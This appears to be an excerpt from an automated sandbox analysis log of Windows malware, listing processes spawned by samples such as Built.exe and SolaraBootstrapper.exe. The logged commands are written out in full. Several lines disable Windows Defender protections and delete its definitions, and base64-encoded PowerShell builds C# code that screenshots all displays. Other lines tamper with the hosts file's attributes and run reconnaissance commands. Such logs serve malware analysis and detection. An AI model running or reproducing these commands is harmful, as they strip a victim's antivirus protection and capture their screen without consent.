    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDAF6.tmp" "c:\Users\user\AppData\Local\Temp\gkfhm5n3\CSCE3FF6834DD6C4DE392BB63A4482876F5.TMP"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentInto\fontsessionruntime.exe "C:\agentInto\fontsessionruntime.exe"
    Source: C:\agentInto\fontsessionruntime.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
